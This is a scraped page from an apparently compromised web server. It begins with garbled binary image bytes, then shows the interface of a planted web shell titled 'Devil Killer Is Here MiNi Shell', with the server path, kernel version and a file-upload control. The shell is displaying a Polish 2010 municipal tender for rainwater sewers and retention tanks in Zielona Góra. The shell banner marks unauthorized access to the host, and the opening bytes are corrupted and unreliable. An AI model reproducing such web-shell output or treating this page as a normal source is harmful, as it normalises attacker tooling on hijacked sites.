JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100728/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100728/201695-N-2010.html

<p class="kh_header"><b>Zielona Góra: Przebudowa ul. Jędrzychowskiej w Zielonej Górze - Etap II - budowa sieci kanalizacji deszczowej w ulicach: Wierzbowej, Alfreda Nobla, Warzywnej, Makowej, Aleksandra Czekanowskiego oraz Jana Czerskiego i Jędrzeja Śniadeckiego wraz z budową zbiorników retencyjnych</b><br>
<b>Numer ogłoszenia: 201695 - 2010; data zamieszczenia: 28.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta , ul. Podgórna 22, 65-424 Zielona Góra, woj. lubuskie, tel. 0684564100,4564406 do 08, faks 068 4564155, 4564455.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zielona-gora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. Jędrzychowskiej w Zielonej Górze - Etap II - budowa sieci kanalizacji deszczowej w ulicach: Wierzbowej, Alfreda Nobla, Warzywnej, Makowej, Aleksandra Czekanowskiego oraz Jana Czerskiego i Jędrzeja Śniadeckiego wraz z budową zbiorników retencyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.	Przedmiot zamówienia: przebudowa ul. Jędrzychowskiej w Zielonej Górze - Etap II - budowa sieci kanalizacji deszczowej w ulicach: Wierzbowej, Alfreda Nobla, Warzywnej, Makowej, Aleksandra Czekanowskiego oraz Jana Czerskiego i Jędrzeja Śniadeckiego wraz z budową zbiorników retencyjnych, który należy wykonać w oparciu o dokumentację projektową stanowiącą integralną część niniejszej SIWZ. 
- Zakres przedmiotu zamówienia:
3.1.	Kanalizacja deszczowa w następujących ulicach:
3.1.1.	ul. Warzywna, odcinek: S10-S11-S12-S13-S14-S15-S16-S17-S17/1-S17/2-S19-S20, w tym: 
3.1.1.1.	Rurociągi z rur PVC d=400mm - l=256,8m.
3.1.1.2.	Studnie  z tworzyw sztucznych d=600mm - 1szt.
3.1.1.3.	Studnie betonowe d=1200mm - 10szt.
3.1.1.4.	Studnie betonowe d=1400mm - 1szt.

3.1.2.	ul. Wierzbowa, odcinek: K1-S38-S37-S36-S35-S10-S9/2-S9/1-S9-S8/1, (S10 wliczona w ul. Warzywnej), w tym:
3.1.2.1.	Rurociągi  z rur PVC d=315mm - l=149,2m.
3.1.2.2.	Rurociągi  z rur PVC d=500mm - 31,6m.
3.1.2.3.	Studnie  z tworzyw sztucznych d=600mm - 3szt.
3.1.2.4.	Studnie betonowe d=1200mm - 2szt.
3.1.2.5.	Studnie betonowe d=1400mm - 4szt.

3.1.3.	ul. Alfreda Nobla, odcinki: S6-S7-S8-S8/1 i  S60-S61-S62-S63, (S8/1 wliczona w ul. Wierzbowej), w tym:
3.1.3.1.	Rurociągi  z rur PVC d=500mm - 69,3m.
3.1.3.2.	Rurociągi z rur żywic poliestrowych d=500mm - 78,9m.
3.1.3.3.	Studnie betonowe d=1400mm - 7szt.

3.1.4.	ul. Aleksandra Czekanowskiego, odcinek: S63-S64-S65-S66-S67-S68-S69-S70, (S63 wliczona w ul. Alfreda Nobla), w tym:
3.1.4.1.	Rurociągi  z rur PVC d=400mm - 187,0m.
3.1.4.2.	Rurociągi z rur żywic poliestrowych d=400mm - 77,4m. 
3.1.4.3.	Studnie betonowe d=1400mm - 7szt.

3.1.5.	ul. Jana Czerskiego, odcinek: wylot-SO-zbiornik-S1-SP-PS-OS-SR-S2-S3-S4-S5-S6, (S6 wliczona w ul. Alfreda Nobla), w tym: 
3.1.5.1.	Rurociągi  z rur PVC d=250mm - 14,8m.
3.1.5.2.	Rurociągi  z rur PVC d=500mm - 77,5m.
3.1.5.3.	Rurociągi z rur żywic poliestrowych d=500mm - 14,9m. 
3.1.5.4.	Studnie betonowe d=1400mm - 5szt.
3.1.5.5.	Studnia d=1200mm z korytkowym regulatorem przepływu (SO) - 1 kpl.
3.1.5.6.	System przelewowy  Q=40/460 l/s - 1kpl.

3.1.6.	Ul. Jędrzeja Śniadeckiego, odcinek: wylot-S51-zbiornik-S52-SP-PS-OS-SR-S53-S54-S55-S56-S57-S59-S60, (S60 wliczona w ul. Alfreda Nobla), w tym:
3.1.6.1.	Rurociągi  z rur PVC d=250mm - 15,2m.
3.1.6.2.	Rurociągi z rur żywic poliestrowych d=600mm - 170,0m. 
3.1.6.3.	Studnie betonowe d=1400mm - 7szt.
3.1.6.4.	Studnia d=1200mm z stożkowym regulatorem przepływu (S51) - 1 kpl.
3.1.6.5.	System przelewowy  Q=50/575 l/s - 1kpl.

3.2.	 Zbiorniki  retencyjne  dla odprowadzania wód deszczowych do cieku Dłubnia, w tym:
3.2.1.	Zbiornik retencyjny nr 3 przy ul. Jana Czerskiego, którego zakres obejmuje:
3.2.1.1.	Budowę żelbetowego szczelnego zbiornika o wym. 23,04 x 53,04m, wys. h=1,0m 
	i pow. F=1192m, z wlotem dla rury d=500mm i wylotem dla rury d=250mm oraz wykonaniem
	robót  przygotowawczych, ziemnych, drenażowych i odwodnieniowych. 
	Ściany zbiornika gr.20cm a dno gr.50cm z betonu wodoszczelnego B30 (C26/30), W8. 
	Ściany oraz dno wlotu i wylotu, gr.20cm z betonu wodoszczelnego B20 (C16/20), W6.
3.2.1.2.	Budowę  żelbetowego wylotu rury kolektora deszczowego d=250 do cieku Dłubnia wraz 
z robotami ziemnymi, odwodnieniem, regulacją i umocnieniem skarp i dna cieku. 
Ściany oraz dno wylotu gr.20cm z betonu wodoszczelnego B20 (C16/20), W6.
3.2.1.3.	Wykonanie ogrodzenia o wys.1,5m  z siatki 50*50/2,8mm z drutu ocynk. powlekanego na słupkach d=42,2mm ocynk. i powlekanych PWC osadzonych w stopach z betonu B20 wraz
z bramą i furtką.
3.2.1.4.	Wykonanie nawierzchni komunikacyjnych  z polbruku gr.8cm (dojazd) i gr.6cm (chodnik) oraz opaski przy ogrodzeniu z płyt ażurowych 60*40cm, gr.10cm.
3.2.1.5.	Wykonanie pasa technologicznego wzdłuż cieku Dłubnia  z połączeniem do drogi dojazdowej o nawierzchni żwirowo-gliniastej gr.15cm.
3.2.1.6.	Ukształtowanie terenu wraz z plantowaniem terenu i skarp, rozścieleniem ziemi urodzajnej, obsianiem i ułożeniem  trawy z rolki.

Uwaga: Orientacyjne ilości przedmiarowe w opisie technicznym.

3.2.2.	Zbiornik retencyjny nr 4 przy ul. Jędrzeja Śniadeckiego, którego zakres obejmuje:
3.2.2.1.	Budowę żelbetowej płyty zbiornika gr.20cm o wym. 25,0x 50,0m i  pow. F=1250m, ze zjazdem o naw. betonowej gr.20cm,  wlotem dla rury d=500mm i wylotem dla rury d=250mm oraz wykonaniem robót  przygotowawczych, ziemnych, drenażowych i odwodnieniowych. Ściany budowli, dno wlotu i wylotu, płyty dennej zbiornika oraz zjazdu gr.20cm z betonu wodoszczelnego B20 (C16/20), W6.
3.2.2.2.	Budowę  żelbetowego wylotu rury kolektora deszczowego d=250 do cieku Dłubnia wraz
 z robotami ziemnymi, odwodnieniem, regulacją i umocnieniem skarp i dna cieku. 
	Ściany oraz dno wylotu gr.20cm z betonu wodoszczelnego B20 (C16/20), W6.
3.2.2.3.	Umocnienie skarp wewnętrznych oraz korony zbiornika (opaska przy ogrodzeniu) z płyt ażurowych 60*40cm, gr.10cm.
3.2.2.4.	Wykonanie ogrodzenia o wys.1,5m  z siatki 50*50/2,8mm z drutu ocynk. powlekanego na słupkach d=42,2mm ocynk. i powlekanych PWC osadzonych w stopach z betonu B20 wraz 
z bramą i furtką.
3.2.2.5.	Wykonanie nawierzchni komunikacyjnych  z polbruku gr.8cm (dojazd) i gr.6cm (chodnik).
3.2.2.6.	Wykonanie pasa technologicznego wzdłuż zbiornika i cieku Dłubnia o nawierzchni żwirowo-gliniastej gr.15cm.
3.2.2.7.	Ukształtowanie terenu wraz plantowaniem terenu i skarp, rozścieleniem ziemi urodzajnej 
i obsianiem trawą.
Uwaga: Orientacyjne ilości przedmiarowe w opisie technicznym

3.3.	Nawierzchnia tłuczniowa jednowarstwowa gr.12cm,  szer.4,0m, w tym: profilowanie terenu, wykonanie koryta i zagęszczenie podłoża w ciągu ulic:
3.3.1.	 Warzywna - 1040m2. 
3.3.2.	Wierzbowa - 600m2.
3.3.3.	Alfreda Nobla - 680m2.
3.3.4.	Aleksandra Czekanowskiego - 1080m2.
3.3.5.	Jana Czerskiego - 320m2. 
3.3.6.	Jędrzeja Śniadeckiego - 580m2.

3.4.	Informacje uzupełniające do przedmiotu zamówienia:

3.4.1.	Wykonanie rurociągów obejmuje:
3.4.1.1.	Wykonanie wykopów wąskoprzestrzennych wraz z umocnieniem ścian i odwodnieniem. 
3.4.1.2.	Montaż i demontaż podwieszeń kabli energetycznych i rurociągów.
3.4.1.3.	Ułożenie kolektorów deszczowych z rur PVC litych, klasy S (SDR34), łączonych na uszczelki gumowe oraz rur z żywic poliestrowych wzmocnionych włóknem szklanym klasy SN10000 na podsypce piaskowej grubości 20cm i wykonanie ręcznej obsypki do poziomu 30cm ponad ułożoną rurę.
3.4.1.4.	Zasypanie wykopów gruntem z wykopu wraz z zagęszczeniem oraz wywóz nadmiaru gruntu. 
3.4.1.5.	Wykonanie próby wodnej  szczelności ułożonych kanałów rurowych.
3.4.1.6.	Wykonanie przeglądu rurociągów kamerą TV.

3.4.2.	Wykonanie studni obejmuje:
3.4.2.1.	Wykonanie wykopów jamistych wraz z umocnieniem ścian i odwodnieniem.
3.4.2.2.	Montaż systemowych studni z prefabrykowanych elementów betonowych o klasie wytrzymałości C35/45 (B45), łącznonych za pomocą uszczelek z elastomeru SBR lub EPDM, na  płycie fundamentowej gr.20cm z betonu B15 i podsypce piaskowej gr.15cm. 
W skład systemu wchodzą: kręgi betonowe d=1200mm (dla rur do d= 300mm) i d=1400mm (dla rur od d= 400mm), zwężki betonowe zgodnie z normą PN-EN1917, pokrywy nadstudzienne z włazem żeliwnym typu ciężkiego d=600mm (zamknięcie z wypełnieniem betonowym), pierścienie dystansowe pod zwieńczenie studni i  dno monolityczne z betonu B-45 z kinetą z betonu C35/45  (B45) oraz z wykonanymi fabrycznie przejściami szczelnymi dla rur (wstawki studziene z PVC lub z żywic poliestrowych) o średnicach odpowiednich dla średnicy rurociągu.
3.4.2.3.	Montaż regulatorów przepływu w studni SO (korytkowy) i S51 (stożkowy).

3.4.3.	Wykonanie systemów przelewowych obejmuje:
3.4.3.1.	 Wykonanie wykopów jamistych i liniowych wraz z umocnieniem ścian i odwodnieniem.
3.4.3.2.	Montaż sytemu przelewowego Q=40/460 l/s dla zbiornika retencyjnego nr3 składającego się 
z separatora koalescencyjnego  d=1500mm, osadnika piasku d=2000mm, studni rozdziału 
z regulatorem przepływu d=1500mm i połączeniowej d=1500mm, rurociągu łączącego PVC d=315mm (4,5m) oraz rurociągu przelewu zewnętrznego z rur PVC d=500mm (10m).
3.4.3.3.	Montaż sytemu przelewowego Q=50/575 l/s dla zbiornika retencyjnego nr4 składającego się 
z separatora koalescencyjnego  d=2000mm, osadnika piasku d=2000mm, studni rozdziału 
z regulatorem przepływu d=1500mm i połączeniowej d=1500mm, rurociągu łączącego PVC d=315mm (4,5m) oraz rurociągu przelewu zewnętrznego z rur PVC d=500mm (12m).
3.4.3.4.	 Zasypanie wykopów gruntem z wykopu wraz z zagęszczeniem oraz wywóz nadmiaru gruntu,
3.4.3.5.	 Wykonanie próby wodnej  szczelności ułożonych kanałów rurowych.
3.4.3.6.	 Wykonanie przeglądu rurociągów kamerą TV.

3.4.4.	W miejscach o wysokim poziomie wody gruntowej, rurociągi układać na geokompozycie drenarskim z siatki polietylenowej pokrytej geowłókniną i  folią LDPE.
3.4.5.	Wszystkie studnie kanalizacji deszczowej należy wynieść do rzędnych  terenu istniejącego.
3.4.6.	Wpusty deszczowe wraz z przykanalikami nie będą realizowane w tym  przedmiocie zamówienia.

3.5.	Informacje dodatkowe do przedmiotu zamówienia:
3.5.1.	Przewiduje się kompleksową realizację przedmiotu zamówienia wraz z obsługą geodezyjną 
w terminie do 15 listopada 2010 roku.
3.5.2.	Wykonawca udzieli gwarancji na wykonany przedmiot zamówienia od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag ) protokołu końcowego na okres 5 lat i rękojmi przekraczającej gwarancję o 6 m-cy.
3.5.3.	Cały zakres prac wykonać zgodnie z dokumentacją techniczną:
3.5.3.1.	Projekt wykonawczy - ul. Alfreda Nobla ,Wierzbowa i Warzywna;  kanalizacja deszczowa-odwodnienie ulic ,
3.5.3.2.	Projekt wykonawczy zagospodarowania terenu i konstrukcji zbiornika retencyjnego nr 4.
3.5.3.3.	Projekt  wykonawczy zagospodarowania terenu i konstrukcji zbiornika retencyjnego nr 3.
3.5.3.4.	oraz z wytycznymi zapisanymi w  Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.24.54-9, 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany wraz ze złożeniem oferty do wniesienia wadium 
w wysokości 95.000,00 złotych (słownie: dziewięćdziesiąt pięć tysięcy złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 2 ustawy pzp oraz spełniający szczegółowe warunki udziału w postępowaniu:
9.1.2.1.	posiadają wiedzę i doświadczenie w realizacji w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,    co najmniej dwóch zadań o minimalnej wartości 2.000.000,00 zł brutto każde w zakresie budowy sieci kanalizacji deszczowej lub sanitarnej, w tym jedno zadanie winno obejmować wykonanie sieci z żywic poliestrowych wzmocnionych włóknem szklanym oraz robót inżynieryjno - budowlanych o wartości powyżej 500.000,00 zł brutto, udokumentowane, że zostało wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (Zamawiający nie dopuszcza sumowania zadań celem uzyskania wymaganego warunku kwotowego).
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3), 6.1.6) i 6.1.9) SIWZ;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>9.1.4.	osoby zdolne do wykonania zamówienia - o udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 3 ustawy pzp oraz spełniający szczegółowe warunki udziału w postępowaniu:
9.1.5.	dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć                                 w wykonywaniu zamówienia, należącymi do właściwej izby samorządu zawodowego, posiadającymi zgodnie z ustawą z dnia z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. 
z 2006 r. Nr 156, poz. 1118 - tekst jednolity z późn. zm.) uprawnienia budowlane do kierowania robotami budowlanymi lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w specjalności:
9.1.5.1.	 instalacyjnej, w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń (min. 1 osoba);
9.1.5.2.	konstrukcyjno - budowlanej minimum w ograniczonym zakresie (min. 1 osoba);
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3), 6.1.7)- 6.1.8) i 6.1.9) SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony formularz oferty wg załącznika nr 1 do SIWZ;
2)	oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy podwykonawcom wg załącznika nr 2 do SIWZ; 
10)	dokładnie wypełniona Zbiorcza Tabela Elementów Rozliczeniowych wraz z ceną końcową (netto) przedmiotu zamówienia na formularzu wg załącznika nr 9 do SIWZ;
11)	pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
